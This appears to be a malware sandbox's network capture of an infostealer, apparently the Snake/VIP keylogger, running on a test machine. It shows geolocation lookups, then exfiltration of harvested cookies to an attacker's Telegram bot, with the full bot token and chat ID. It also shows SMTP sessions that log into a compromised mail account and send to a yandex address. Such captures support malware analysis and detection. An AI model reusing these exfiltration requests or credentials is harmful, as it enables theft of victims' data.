2024-12-16 13:23:28 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49803	104.21.67.152	443	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:31 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:23:31 UTC	880	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 344180 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uO9rrxm1p5oF2Rvq2p63eKYXTs1pDi4zdOAw4w0Du0%2BuhyBM9X4K6Efp7SNlkDdHN8EMSRNZdQcwHaG7qgs2ojg%2FN0P3O%2F9VYqaavCBEvibGJr%2FJ453eAl8AaI%2BguygnnPVgEIpa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2efd0b6cee4283-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1569&rtt_var=597&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1820448&cwnd=241&unsent_bytes=0&cid=021e6bd04f1f299e&ts=452&x=0"
2024-12-16 13:23:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49805	104.21.67.152	443	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:31 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-16 13:23:32 UTC	878	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:32 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 344181 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iSDJrPJb%2Bq4YnBrNlsPYFUTScFiuBU4kyvR4tyByYbWH%2FYnI9N53uz4atz%2B32N7HWIPatL1zv0NKFAzjTziuFyG2CtgXkjLODdY8Ci75OaiosbejwIaeuAmASlGi%2BykqmfH84ITD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2efd0d0dfd8c36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1980&rtt_var=764&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1413359&cwnd=165&unsent_bytes=0&cid=f563f091d4f3583a&ts=455&x=0"
2024-12-16 13:23:32 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49813	104.21.67.152	443	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:34 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:23:34 UTC	874	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 344183 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2MIPJRk9XBygdzj4Fkp5lalHl1SeBHmy8JIdkE7A0br6xp0pPagdpQyG6jc5vtpNdkZb1pMbqgS8XwVT3fV7YM51NZ%2FlAqcZ6%2FgfsuJ2MtRDYAIEdWmNEM0jlwn1MkfVjRlk7lo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2efd1e294d41cd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2176&min_rtt=2127&rtt_var=833&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1372825&cwnd=227&unsent_bytes=0&cid=4427e0087b6d8471&ts=457&x=0"
2024-12-16 13:23:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49814	104.21.67.152	443	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:34 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:23:35 UTC	874	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:35 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 344184 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hVlM9pcHrMR7cUgqV7Ap072eWSybfGT2zdvs1gB1APXbAorskh5iOft9qV63sajfOwnxUJKlmdb0KO%2B7aRFqheF4f%2FBtn6NmsTevGeaY5bm7z4kH8u1WtpdxRdaHWoJjSy3Po2QO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2efd1fde7c0f65-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1473&min_rtt=1464&rtt_var=567&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1898569&cwnd=222&unsent_bytes=0&cid=a316f3b5e729b07e&ts=458&x=0"
2024-12-16 13:23:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49820	149.154.167.220	443	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:36 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:992547%0D%0ADate%20and%20Time:%2017/12/2024%20/%2010:57:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20992547%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-16 13:23:36 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:23:36 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:23:36 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49826	104.21.67.152	443	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:37 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-16 13:23:38 UTC	876	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 344187 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JGyG%2FH%2FuysKpMRu6hnNOvlbHlI9vP0orbUurl00HZVuofFaBrYjlX8f9dJQev8GxLRZRkoHK7Os6AUHamIuNCGMF0moWYYjHWq5q73LOEH3%2BbAIdRZ0kMB9XG2MN2BaJVgQL0zrz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2efd32de0442bd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1614&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1794714&cwnd=196&unsent_bytes=0&cid=1f07e8a9373144af&ts=464&x=0"
2024-12-16 13:23:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49829	149.154.167.220	443	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:39 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:992547%0D%0ADate%20and%20Time:%2017/12/2024%20/%2013:23:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20992547%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-16 13:23:40 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:23:39 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:23:40 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49860	149.154.167.220	443	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:50 UTC	380	OUT	POST /bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd1f0d506ad3d1 Host: api.telegram.org Content-Length: 1281 Connection: Keep-Alive
2024-12-16 13:23:50 UTC	1281	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 30 64 35 30 36 61 64 33 64 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 65 6e 67 69 6e 65 65 72 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 39 32 35 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 Data Ascii: --------------------------8dd1f0d506ad3d1Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies \| user \| VIP Recovery PC Name:992547Date and Time: 16/12/202
2024-12-16 13:23:51 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:23:50 GMT Content-Type: application/json Content-Length: 553 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:23:51 UTC	553	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 34 38 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 33 39 35 36 34 36 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 4e 41 4b 45 56 49 50 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 4e 41 4b 45 56 49 50 4c 4f 47 47 45 52 42 4f 54 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 34 34 33 38 32 35 38 35 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 61 73 79 6d 6f 6e 69 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 64 70 73 70 61 6d 6d 69 6e 67 73 75 72 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 35 34 33 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":34845,"from":{"id":7339564661,"is_bot":true,"first_name":"SNAKEVIPLOGGER","username":"SNAKEVIPLOGGERBOT"},"chat":{"id":6443825857,"first_name":"Easymoni","username":"Rdpspammingsure","type":"private"},"date":1734355430,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49865	149.154.167.220	443	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:51 UTC	380	OUT	POST /bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd1f22c705a7ac Host: api.telegram.org Content-Length: 1281 Connection: Keep-Alive
2024-12-16 13:23:51 UTC	1281	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 32 32 63 37 30 35 61 37 61 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 65 6e 67 69 6e 65 65 72 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 39 32 35 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 Data Ascii: --------------------------8dd1f22c705a7acContent-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies \| user \| VIP Recovery PC Name:992547Date and Time: 16/12/202
2024-12-16 13:23:52 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:23:52 GMT Content-Type: application/json Content-Length: 553 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:23:52 UTC	553	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 34 38 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 33 39 35 36 34 36 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 4e 41 4b 45 56 49 50 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 4e 41 4b 45 56 49 50 4c 4f 47 47 45 52 42 4f 54 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 34 34 33 38 32 35 38 35 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 61 73 79 6d 6f 6e 69 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 64 70 73 70 61 6d 6d 69 6e 67 73 75 72 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 35 34 33 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":34846,"from":{"id":7339564661,"is_bot":true,"first_name":"SNAKEVIPLOGGER","username":"SNAKEVIPLOGGERBOT"},"chat":{"id":6443825857,"first_name":"Easymoni","username":"Rdpspammingsure","type":"private"},"date":1734355432,"d

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Dec 16, 2024 14:23:45.929615021 CET	587	49847	118.69.190.131	192.168.2.6	220 isphost2.fptdata.vn ESMTP Exim 4.94 Mon, 16 Dec 2024 20:23:45 +0700
Dec 16, 2024 14:23:45.929905891 CET	49847	587	192.168.2.6	118.69.190.131	EHLO 992547
Dec 16, 2024 14:23:46.499538898 CET	587	49847	118.69.190.131	192.168.2.6	250-isphost2.fptdata.vn Hello 992547 [8.46.123.189] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-X_PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Dec 16, 2024 14:23:46.500762939 CET	49847	587	192.168.2.6	118.69.190.131	AUTH login c2FsZXMtbmd1eWVuQHZ2dHJhZGUudm4=
Dec 16, 2024 14:23:47.068531990 CET	587	49847	118.69.190.131	192.168.2.6	334 UGFzc3dvcmQ6
Dec 16, 2024 14:23:47.650415897 CET	587	49847	118.69.190.131	192.168.2.6	235 Authentication succeeded
Dec 16, 2024 14:23:47.650902987 CET	49847	587	192.168.2.6	118.69.190.131	MAIL FROM:<sales-nguyen@vvtrade.vn>
Dec 16, 2024 14:23:47.682161093 CET	587	49852	118.69.190.131	192.168.2.6	220 isphost2.fptdata.vn ESMTP Exim 4.94 Mon, 16 Dec 2024 20:23:47 +0700
Dec 16, 2024 14:23:47.696186066 CET	49852	587	192.168.2.6	118.69.190.131	EHLO 992547
Dec 16, 2024 14:23:48.230437040 CET	587	49847	118.69.190.131	192.168.2.6	250 OK
Dec 16, 2024 14:23:48.230714083 CET	49847	587	192.168.2.6	118.69.190.131	RCPT TO:<saleseuropower@yandex.com>
Dec 16, 2024 14:23:48.265968084 CET	587	49852	118.69.190.131	192.168.2.6	250-isphost2.fptdata.vn Hello 992547 [8.46.123.189] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-X_PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Dec 16, 2024 14:23:48.283368111 CET	49852	587	192.168.2.6	118.69.190.131	AUTH login c2FsZXMtbmd1eWVuQHZ2dHJhZGUudm4=
